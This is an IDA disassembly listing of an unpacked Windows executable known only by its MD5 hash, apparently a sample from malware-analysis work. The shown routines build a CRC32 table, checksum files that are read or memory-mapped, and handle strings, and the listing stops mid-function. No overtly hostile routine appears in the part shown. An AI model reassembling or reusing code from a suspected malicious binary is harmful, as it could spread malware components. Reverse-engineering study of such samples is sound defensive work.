;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 0CFE2D6216D393385D168103E6D45E2B
; File Name : u:\work\0cfe2d6216d393385d168103e6d45e2b_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00015000 ( 86016.)
; Section size in file : 00015000 ( 86016.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
HSho segment para public 'CODE' use32
assume cs:HSho
;org 401000h
assume es:nothing, ss:nothing, ds:HSho, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; CODE XREF: sub_404AAE+28�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax+4], 0
mov ecx, [ebp+var_4]
mov dword ptr [ecx], offset off_4132C8
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401021 proc near ; CODE XREF: sub_4019B0+A�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov dword ptr [eax], offset off_4132C8
mov ecx, [ebp+var_4]
call sub_4010DD
mov esp, ebp
pop ebp
retn
sub_401021 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40103D proc near ; CODE XREF: sub_404AAE+38�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_18], ecx
mov [ebp+var_4], 0EDB88320h
mov ecx, [ebp+var_18]
call sub_4010DD
push 400h
call sub_4114F4
add esp, 4
mov [ebp+var_14], eax
mov eax, [ebp+var_18]
mov ecx, [ebp+var_14]
mov [eax+4], ecx
mov [ebp+var_C], 0
jmp short loc_401080
; ---------------------------------------------------------------------------
loc_401077: ; CODE XREF: sub_40103D+9A�j
mov edx, [ebp+var_C]
add edx, 1
mov [ebp+var_C], edx
loc_401080: ; CODE XREF: sub_40103D+38�j
cmp [ebp+var_C], 100h
jge short loc_4010D9
mov eax, [ebp+var_C]
mov [ebp+var_8], eax
mov [ebp+var_10], 8
jmp short loc_4010A1
; ---------------------------------------------------------------------------
loc_401098: ; CODE XREF: sub_40103D:loc_4010C6�j
mov ecx, [ebp+var_10]
sub ecx, 1
mov [ebp+var_10], ecx
loc_4010A1: ; CODE XREF: sub_40103D+59�j
cmp [ebp+var_10], 0
jle short loc_4010C8
mov edx, [ebp+var_8]
and edx, 1
test edx, edx
jz short loc_4010BE
mov eax, [ebp+var_8]
shr eax, 1
xor eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_4010C6
; ---------------------------------------------------------------------------
loc_4010BE: ; CODE XREF: sub_40103D+72�j
mov ecx, [ebp+var_8]
shr ecx, 1
mov [ebp+var_8], ecx
loc_4010C6: ; CODE XREF: sub_40103D+7F�j
jmp short loc_401098
; ---------------------------------------------------------------------------
loc_4010C8: ; CODE XREF: sub_40103D+68�j
mov edx, [ebp+var_18]
mov eax, [edx+4]
mov ecx, [ebp+var_C]
mov edx, [ebp+var_8]
mov [eax+ecx*4], edx
jmp short loc_401077
; ---------------------------------------------------------------------------
loc_4010D9: ; CODE XREF: sub_40103D+4A�j
mov esp, ebp
pop ebp
retn
sub_40103D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010DD proc near ; CODE XREF: sub_401021+13�p
; sub_40103D+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov ecx, [eax+4]
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
push edx
call sub_4114EE
add esp, 4
mov eax, [ebp+var_8]
mov dword ptr [eax+4], 0
mov esp, ebp
pop ebp
retn
sub_4010DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401109 proc near ; CODE XREF: HSho:004016A6�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_401109
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_14], 1
mov [ebp+var_4], 0
mov [ebp+var_1C], 0
mov [ebp+var_18], 0
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
push ecx
call dword_413024 ; GetFileSize
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0FFFFFFFFh
jnz short loc_40117B
call dword_413028 ; RtlGetLastWin32Error
test eax, eax
jz short loc_40117B
mov [ebp+var_14], 0
mov edx, [ebp+arg_4]
mov dword ptr [edx], 0
mov dword ptr [edx+4], 0
jmp short loc_40119B
; ---------------------------------------------------------------------------
loc_40117B: ; CODE XREF: sub_401109+50�j
; sub_401109+5A�j
mov eax, [ebp+var_18]
xor edx, edx
mov ecx, 20h
call sub_411580
mov ecx, [ebp+var_1C]
xor esi, esi
or eax, ecx
or edx, esi
mov ecx, [ebp+arg_4]
mov [ecx], eax
mov [ecx+4], edx
loc_40119B: ; CODE XREF: sub_401109+70�j
jmp short loc_4011A7
; ---------------------------------------------------------------------------
loc_40119D: ; DATA XREF: HSho:00414BD4�o
mov [ebp+var_14], 0
mov eax, offset loc_4011A7
retn
; ---------------------------------------------------------------------------
loc_4011A7: ; CODE XREF: sub_401109:loc_40119B�j
; DATA XREF: sub_401109+98�o
mov [ebp+var_4], 0FFFFFFFFh
mov al, [ebp+var_14]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_401109 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_411A7A
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-1Ch], ecx
mov dword ptr [ebp-14h], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov dword ptr [ebp-4], 0
mov ecx, [ebp-1Ch]
cmp dword ptr [ecx+4], 0
jnz short loc_40121C
mov dword ptr [ebp-18h], 0
push offset dword_414DC0
lea edx, [ebp-18h]
push edx
call sub_4115BC ; _CxxThrowException
loc_40121C: ; CODE XREF: HSho:00401205�j
; HSho:00401241�j
mov eax, [ebp+8]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_401243
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp+8]
mov cl, [eax]
push ecx
mov ecx, [ebp-1Ch]
call sub_4019E0
mov edx, [ebp+8]
add edx, 1
mov [ebp+8], edx
jmp short loc_40121C
; ---------------------------------------------------------------------------
loc_401243: ; CODE XREF: HSho:00401224�j
jmp short loc_401252
; ---------------------------------------------------------------------------
loc_401245: ; DATA XREF: HSho:00414C2C�o
mov dword ptr [ebp-14h], 17h
mov eax, offset loc_401252
retn
; ---------------------------------------------------------------------------
loc_401252: ; CODE XREF: HSho:loc_401243�j
; DATA XREF: HSho:0040124C�o
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp+0Ch]
mov ecx, [eax]
not ecx
mov edx, [ebp+0Ch]
mov [edx], ecx
mov eax, [ebp-14h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset loc_411A8E
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 108Ch
call sub_4115D0
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-1084h], ecx
mov dword ptr [ebp-14h], 0
push 1
lea ecx, [ebp-70h]
call dword_41315C
mov dword ptr [ebp-4], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov byte ptr [ebp-4], 1
mov ecx, [ebp-1084h]
cmp dword ptr [ecx+4], 0
jnz short loc_4012F7
mov dword ptr [ebp-107Ch], 0
push offset dword_414DC0
lea edx, [ebp-107Ch]
push edx
call sub_4115BC ; _CxxThrowException
loc_4012F7: ; CODE XREF: HSho:004012DA�j
mov eax, dword_413158
mov ecx, [eax]
push ecx
push 0A1h
mov edx, [ebp+8]
push edx
lea ecx, [ebp-70h]
call dword_413154
lea ecx, [ebp-70h]
call dword_413140
mov [ebp-1088h], eax
cmp dword ptr [ebp-1088h], 0
jnz short loc_40134D
mov eax, [ebp-70h]
mov ecx, [eax+4]
lea ecx, [ebp+ecx-70h]
call dword_413160
mov [ebp-108Ch], eax
mov edx, [ebp-108Ch]
mov [ebp-14h], edx
jmp loc_401400
; ---------------------------------------------------------------------------
loc_40134D: ; CODE XREF: HSho:00401327�j
push 1000h
lea eax, [ebp-1078h]
push eax
lea ecx, [ebp-70h]
call dword_413144
mov [ebp-1090h], eax
mov ecx, [ebp-1090h]
call dword_413148
mov [ebp-1094h], eax
mov ecx, [ebp-1094h]
mov [ebp-78h], ecx
loc_401383: ; CODE XREF: HSho:004013F5�j
cmp dword ptr [ebp-78h], 0
jz short loc_4013F7
mov dword ptr [ebp-74h], 0
jmp short loc_40139B
; ---------------------------------------------------------------------------
loc_401392: ; CODE XREF: HSho:004013BD�j
mov edx, [ebp-74h]
add edx, 1
mov [ebp-74h], edx
loc_40139B: ; CODE XREF: HSho:00401390�j
mov eax, [ebp-74h]
cmp eax, [ebp-78h]
jge short loc_4013BF
mov ecx, [ebp+0Ch]
push ecx
mov edx, [ebp-74h]
mov al, [ebp+edx-1078h]
push eax
mov ecx, [ebp-1084h]
call sub_4019E0
jmp short loc_401392
; ---------------------------------------------------------------------------
loc_4013BF: ; CODE XREF: HSho:004013A1�j
push 1000h
lea ecx, [ebp-1078h]
push ecx
lea ecx, [ebp-70h]
call dword_413144
mov [ebp-1098h], eax
mov ecx, [ebp-1098h]
call dword_413148
mov [ebp-109Ch], eax
mov edx, [ebp-109Ch]
mov [ebp-78h], edx
jmp short loc_401383
; ---------------------------------------------------------------------------
loc_4013F7: ; CODE XREF: HSho:00401387�j
lea ecx, [ebp-70h]
call dword_41314C
loc_401400: ; CODE XREF: HSho:00401348�j
jmp short loc_40140F
; ---------------------------------------------------------------------------
loc_401402: ; DATA XREF: HSho:00414C8C�o
mov dword ptr [ebp-14h], 17h
mov eax, offset loc_40140F
retn
; ---------------------------------------------------------------------------
loc_40140F: ; CODE XREF: HSho:loc_401400�j
; DATA XREF: HSho:00401409�o
mov dword ptr [ebp-4], 0
lea ecx, [ebp-70h]
call dword_413140
test eax, eax
jz short loc_40142C
lea ecx, [ebp-70h]
call dword_41314C
loc_40142C: ; CODE XREF: HSho:00401421�j
mov eax, [ebp+0Ch]
mov ecx, [eax]
not ecx
mov edx, [ebp+0Ch]
mov [edx], ecx
mov eax, [ebp-14h]
mov [ebp-1080h], eax
mov dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-70h]
call dword_413150
mov eax, [ebp-1080h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40146A proc near ; CODE XREF: sub_404AAE+46�p
var_102C = dword ptr -102Ch
var_1028 = dword ptr -1028h
var_1024 = dword ptr -1024h
var_1020 = byte ptr -1020h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_40146A
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 101Ch
call sub_4115D0
push ebx
push esi
push edi
mov [ebp+var_10], esp
mov [ebp+var_102C], ecx
mov [ebp+var_18], 0
mov [ebp+var_14], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0FFFFFFFFh
mov [ebp+var_4], 0
mov ecx, [ebp+var_102C]
cmp dword ptr [ecx+4], 0
jnz short loc_4014DE
mov [ebp+var_1028], 0
push offset dword_414DC0
lea edx, [ebp+var_1028]
push edx
call sub_4115BC ; _CxxThrowException
loc_4014DE: ; CODE XREF: sub_40146A+57�j
push 0
push 8000027h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+arg_0]
push eax
call dword_413018 ; CreateFileA
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_401511
call dword_413028 ; RtlGetLastWin32Error
mov [ebp+var_18], eax
jmp loc_40159F
; ---------------------------------------------------------------------------
loc_401511: ; CODE XREF: sub_40146A+97�j
push 0
lea ecx, [ebp+var_1024]
push ecx
push 1000h
lea edx, [ebp+var_1020]
push edx
mov eax, [ebp+var_14]
push eax
call dword_41301C ; ReadFile
mov [ebp+var_20], eax
loc_401533: ; CODE XREF: sub_40146A+133�j
cmp [ebp+var_20], 0
jz short loc_40159F
cmp [ebp+var_1024], 0
jz short loc_40159F
mov [ebp+var_1C], 0
jmp short loc_401554
; ---------------------------------------------------------------------------
loc_40154B: ; CODE XREF: sub_40146A+10F�j
mov ecx, [ebp+var_1C]
add ecx, 1
mov [ebp+var_1C], ecx
loc_401554: ; CODE XREF: sub_40146A+DF�j
mov edx, [ebp+var_1C]
cmp edx, [ebp+var_1024]
jnb short loc_40157B
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+var_1C]
mov dl, [ebp+ecx+var_1020]
push edx
mov ecx, [ebp+var_102C]
call sub_4019E0
jmp short loc_40154B
; ---------------------------------------------------------------------------
loc_40157B: ; CODE XREF: sub_40146A+F3�j
push 0
lea eax, [ebp+var_1024]
push eax
push 1000h
lea ecx, [ebp+var_1020]
push ecx
mov edx, [ebp+var_14]
push edx
call dword_41301C ; ReadFile
mov [ebp+var_20], eax
jmp short loc_401533
; ---------------------------------------------------------------------------
loc_40159F: ; CODE XREF: sub_40146A+A2�j
; sub_40146A+CD�j ...
jmp short loc_4015AE
; ---------------------------------------------------------------------------
loc_4015A1: ; DATA XREF: HSho:00414CE4�o
mov [ebp+var_18], 17h
mov eax, offset loc_4015AE
retn
; ---------------------------------------------------------------------------
loc_4015AE: ; CODE XREF: sub_40146A:loc_40159F�j
; DATA XREF: sub_40146A+13E�o
mov [ebp+var_4], 0FFFFFFFFh
cmp [ebp+var_14], 0
jz short loc_4015C5
mov eax, [ebp+var_14]
push eax
call dword_413020 ; CloseHandle
loc_4015C5: ; CODE XREF: sub_40146A+14F�j
mov ecx, [ebp+arg_4]
mov edx, [ecx]
not edx
mov eax, [ebp+arg_4]
mov [eax], edx
mov eax, [ebp+var_18]
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
sub_40146A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_411AA2
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
sub esp, 38h
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-44h], ecx
mov dword ptr [ebp-1Ch], 0
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-14h], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov dword ptr [ebp-4], 0
mov ecx, [ebp-44h]
cmp dword ptr [ecx+4], 0
jnz short loc_40164F
mov dword ptr [ebp-40h], 0
push offset dword_414DC0
lea edx, [ebp-40h]
push edx
call sub_4115BC ; _CxxThrowException
loc_40164F: ; CODE XREF: HSho:00401638�j
push 0
push 8000027h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call dword_413018 ; CreateFileA
mov [ebp-18h], eax
cmp dword ptr [ebp-18h], 0FFFFFFFFh
jnz short loc_401682
call dword_413028 ; RtlGetLastWin32Error
mov [ebp-1Ch], eax
jmp loc_4017D5
; ---------------------------------------------------------------------------
loc_401682: ; CODE XREF: HSho:00401672�j
mov dword ptr [ebp-2Ch], 0
mov dword ptr [ebp-28h], 0
mov dword ptr [ebp-24h], 0
mov dword ptr [ebp-20h], 0
lea ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-18h]
push edx
call sub_401109
add esp, 8
mov [ebp-48h], al
mov eax, [ebp-48h]
and eax, 0FFh
test eax, eax
jnz short loc_4016C9
mov dword ptr [ebp-1Ch], 18h
jmp loc_4017D5
; ---------------------------------------------------------------------------
loc_4016C9: ; CODE XREF: HSho:004016BB�j
mov ecx, [ebp-2Ch]
or ecx, [ebp-28h]
test ecx, ecx
jz loc_4017D5
push 0
push 0
push 0
push 2
push 0
mov edx, [ebp-18h]
push edx
call dword_413070 ; CreateFileMappingA
mov [ebp-14h], eax
cmp dword ptr [ebp-14h], 0
jnz short loc_401702
call dword_413028 ; RtlGetLastWin32Error
mov [ebp-1Ch], eax
jmp loc_4017D5
; ---------------------------------------------------------------------------
loc_401702: ; CODE XREF: HSho:004016F2�j
; HSho:004017D0�j
cmp dword ptr [ebp-28h], 0
jl loc_4017D5
jg short loc_401718
cmp dword ptr [ebp-2Ch], 0
jbe loc_4017D5
loc_401718: ; CODE XREF: HSho:0040170C�j
cmp dword ptr [ebp-28h], 0
jg short loc_401731
jl short loc_401729
cmp dword ptr [ebp-2Ch], 0A00000h
jnb short loc_401731
loc_401729: ; CODE XREF: HSho:0040171E�j
mov eax, [ebp-2Ch]
mov [ebp-38h], eax
jmp short loc_401738
; ---------------------------------------------------------------------------
loc_401731: ; CODE XREF: HSho:0040171C�j
; HSho:00401727�j
mov dword ptr [ebp-38h], 0A00000h
loc_401738: ; CODE XREF: HSho:0040172F�j
mov ecx, [ebp-38h]
push ecx
mov edx, [ebp-24h]
push edx
mov ecx, 20h
mov eax, [ebp-24h]
mov edx, [ebp-20h]
call sub_411600
and edx, 0
push eax
push 4
mov eax, [ebp-14h]
push eax
call dword_41306C ; MapViewOfFile
mov [ebp-34h], eax
mov ecx, [ebp-38h]
mov [ebp-30h], ecx
mov edx, [ebp-34h]
mov [ebp-3Ch], edx
loc_40176F: ; CODE XREF: HSho:0040179A�j
mov eax, [ebp-30h]
mov ecx, [ebp-30h]
sub ecx, 1
mov [ebp-30h], ecx
test eax, eax
jbe short loc_40179C
mov edx, [ebp+0Ch]
push edx
mov eax, [ebp-3Ch]
mov cl, [eax]
push ecx
mov ecx, [ebp-44h]
call sub_4019E0
mov edx, [ebp-3Ch]
add edx, 1
mov [ebp-3Ch], edx
jmp short loc_40176F
; ---------------------------------------------------------------------------
loc_40179C: ; CODE XREF: HSho:0040177D�j
mov eax, [ebp-34h]
push eax
call dword_413040 ; UnmapViewOfFile
mov ecx, [ebp-38h]
xor edx, edx
mov eax, [ebp-24h]
add eax, ecx
mov ecx, [ebp-20h]
adc ecx, edx
mov [ebp-24h], eax
mov [ebp-20h], ecx
mov edx, [ebp-38h]
xor eax, eax
mov ecx, [ebp-2Ch]
sub ecx, edx
mov edx, [ebp-28h]
sbb edx, eax
mov [ebp-2Ch], ecx
mov [ebp-28h], edx
jmp loc_401702
; ---------------------------------------------------------------------------
loc_4017D5: ; CODE XREF: HSho:0040167D�j
; HSho:004016C4�j ...
jmp short loc_4017E4
; ---------------------------------------------------------------------------
loc_4017D7: ; DATA XREF: HSho:00414D3C�o
mov dword ptr [ebp-1Ch], 17h
mov eax, offset loc_4017E4
retn
; ---------------------------------------------------------------------------
loc_4017E4: ; CODE XREF: HSho:loc_4017D5�j
; DATA XREF: HSho:004017DE�o
mov dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-18h], 0
jz short loc_4017FB
mov eax, [ebp-18h]
push eax
call dword_413020 ; CloseHandle
loc_4017FB: ; CODE XREF: HSho:004017EF�j
cmp dword ptr [ebp-14h], 0
jz short loc_40180B
mov ecx, [ebp-14h]
push ecx
call dword_413020 ; CloseHandle
loc_40180B: ; CODE XREF: HSho:004017FF�j
mov edx, [ebp+0Ch]
mov eax, [edx]
not eax
mov ecx, [ebp+0Ch]
mov [ecx], eax
mov eax, [ebp-1Ch]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset sub_411AAC
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
mov eax, 1018h
call sub_4115D0
push ebx
push esi
push edi
mov [ebp-10h], esp
mov [ebp-1028h], ecx
mov dword ptr [ebp-18h], 0
mov dword ptr [ebp-14h], 0
mov eax, [ebp+0Ch]
mov dword ptr [eax], 0FFFFFFFFh
mov dword ptr [ebp-4], 0
mov ecx, [ebp-1028h]
cmp dword ptr [ecx+4], 0
jnz short loc_4018A1
mov dword ptr [ebp-1024h], 0
push offset dword_414DC0
lea edx, [ebp-1024h]
push edx
call sub_4115BC ; _CxxThrowException
loc_4018A1: ; CODE XREF: HSho:00401884�j
push 0
push 8000027h
push 3
push 0
push 1
push 80000000h
mov eax, [ebp+8]
push eax
call dword_413018 ; CreateFileA
mov [ebp-14h], eax
cmp dword ptr [ebp-14h], 0FFFFFFFFh
jnz short loc_4018D4
call dword_413028 ; RtlGetLastWin32Error
mov [ebp-18h], eax
jmp loc_401964
; ---------------------------------------------------------------------------
loc_4018D4: ; CODE XREF: HSho:004018C4�j
push 0
lea ecx, [ebp-1020h]
push ecx
push 1000h
lea edx, [ebp-101Ch]
push edx
mov eax, [ebp-14h]
push eax
call dword_41301C ; ReadFile
mov [ebp-1Ch], eax
loc_4018F6: ; CODE XREF: HSho:00401962�j
cmp dword ptr [ebp-1Ch], 0
jz short loc_401964
cmp dword ptr [ebp-1020h], 0
jz short loc_401964
push esi
push edi
mov eax, [ebp+0Ch]
mov ecx, [eax]
mov ebx, [ebp-1028h]
mov edi, [ebx+4]
lea esi, [ebp-101Ch]
mov ebx, [ebp-1020h]
lea edx, [esi+ebx]
loc_401924: ; CODE XREF: HSho:00401937�j
xor eax, eax
mov bl, [esi]
mov al, cl
inc esi
xor al, bl
shr ecx, 8
mov ebx, [edi+eax*4]
xor ecx, ebx
cmp edx, esi
jnz short loc_401924
pop edi
pop esi
mov eax, [ebp+0Ch]
mov [eax], ecx
push 0
lea ecx, [ebp-1020h]
push ecx
push 1000h
lea edx, [ebp-101Ch]
push edx
mov eax, [ebp-14h]
push eax
call dword_41301C ; ReadFile
mov [ebp-1Ch], eax
jmp short loc_4018F6
; ---------------------------------------------------------------------------
loc_401964: ; CODE XREF: HSho:004018CF�j
; HSho:004018FA�j ...
jmp short loc_401973
; ---------------------------------------------------------------------------
loc_401966: ; DATA XREF: HSho:00414D94�o
mov dword ptr [ebp-18h], 17h
mov eax, offset loc_401973
retn
; ---------------------------------------------------------------------------
loc_401973: ; CODE XREF: HSho:loc_401964�j
; DATA XREF: HSho:0040196D�o
mov dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-14h], 0
jz short loc_40198A
mov ecx, [ebp-14h]
push ecx
call dword_413020 ; CloseHandle
loc_40198A: ; CODE XREF: HSho:0040197E�j
mov edx, [ebp+0Ch]
mov eax, [edx]
not eax
mov ecx, [ebp+0Ch]
mov [ecx], eax
mov eax, [ebp-18h]
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019B0 proc near ; DATA XREF: HSho:off_4132C8�o
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov ecx, [ebp+var_4]
call sub_401021
mov eax, [ebp+arg_0]
and eax, 1
test eax, eax
jz short loc_4019D5
mov ecx, [ebp+var_4]
push ecx
call sub_4114EE
add esp, 4
loc_4019D5: ; CODE XREF: sub_4019B0+17�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 4
sub_4019B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019E0 proc near ; CODE XREF: HSho:00401233�p
; HSho:004013B8�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+arg_4]
mov ecx, [eax]
shr ecx, 8
mov edx, [ebp+arg_0]
and edx, 0FFh
mov eax, [ebp+arg_4]
mov eax, [eax]
and eax, 0FFh
xor edx, eax
mov eax, [ebp+var_4]
mov eax, [eax+4]
xor ecx, [eax+edx*4]
mov edx, [ebp+arg_4]
mov [edx], ecx
mov esp, ebp
pop ebp
retn 8
sub_4019E0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A20 proc near ; CODE XREF: sub_405B91+D0�p
; sub_405B91+15B�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov [ebp+var_4], 0
loc_401A30: ; CODE XREF: sub_401A20+3C�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_401A5E
mov edx, [ebp+arg_0]
add edx, [ebp+var_4]
movsx eax, byte ptr [edx]
movsx ecx, [ebp+arg_4]
cmp eax, ecx
jnz short loc_401A53
mov eax, [ebp+var_4]
jmp short loc_401A61
; ---------------------------------------------------------------------------
loc_401A53: ; CODE XREF: sub_401A20+2C�j
mov edx, [ebp+var_4]
add edx, 1
mov [ebp+var_4], edx
jmp short loc_401A30
; ---------------------------------------------------------------------------
loc_401A5E: ; CODE XREF: sub_401A20+1B�j
or eax, 0FFFFFFFFh
loc_401A61: ; CODE XREF: sub_401A20+31�j
mov esp, ebp
pop ebp
retn 8
sub_401A20 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
mov [ebp-8], ecx
mov dword ptr [ebp-4], 0
loc_401A77: ; CODE XREF: HSho:00401A8D�j
mov eax, [ebp+8]
add eax, [ebp-4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_401A8F
mov edx, [ebp-4]
add edx, 1
mov [ebp-4], edx
jmp short loc_401A77
; ---------------------------------------------------------------------------
loc_401A8F: ; CODE XREF: HSho:00401A82�j
mov eax, [ebp-4]
sub eax, 1
mov [ebp-4], eax
loc_401A98: ; CODE XREF: HSho:00401AC4�j
mov ecx, [ebp+8]
add ecx, [ebp-4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_401AC6
mov eax, [ebp+8]
add eax, [ebp-4]
movsx ecx, byte ptr [eax]
movsx edx, byte ptr [ebp+0Ch]
cmp ecx, edx
jnz short loc_401ABB
mov eax, [ebp-4]
jmp short loc_401AC9
; ---------------------------------------------------------------------------
loc_401ABB: ; CODE XREF: HSho:00401AB4�j
mov eax, [ebp-4]
sub eax, 1
mov [ebp-4], eax
jmp short loc_401A98
; ---------------------------------------------------------------------------
loc_401AC6: ; CODE XREF: HSho:00401AA3�j
or eax, 0FFFFFFFFh
loc_401AC9: ; CODE XREF: HSho:00401AB9�j
mov esp, ebp
pop ebp
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401ACF proc near ; CODE XREF: HSho:004025F7�p
; sub_4030F7+D8�p ...
var_2008 = dword ptr -2008h
var_2004 = dword ptr -2004h
var_2000 = byte ptr -2000h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
mov eax, 2008h
call sub_4115D0
mov [ebp+var_2008], ecx
mov [ebp+var_2004], 0
push 2000h
push 0
push offset a97 ; "97"
call sub_411622 ; memset
add esp, 0Ch
loc_401B00: ; CODE XREF: sub_401ACF:loc_401B5E�j
mov eax, [ebp+arg_4]
add eax, [ebp+arg_8]
movsx ecx, byte ptr [eax]
test ecx, ecx
jz short loc_401B60
mov edx, [ebp+arg_4]
add edx, [ebp+arg_8]
movsx eax, byte ptr [edx]
push eax
push offset dword_41702C
lea ecx, [ebp+var_2000]
push ecx
call dword_4131E4 ; sprintf
add esp, 0Ch
lea edx, [ebp+var_2000]
push edx
push offset a97 ; "97"
call dword_413074 ; lstrcatA
mov eax, [ebp+arg_8]
add eax, 1
mov [ebp+arg_8], eax
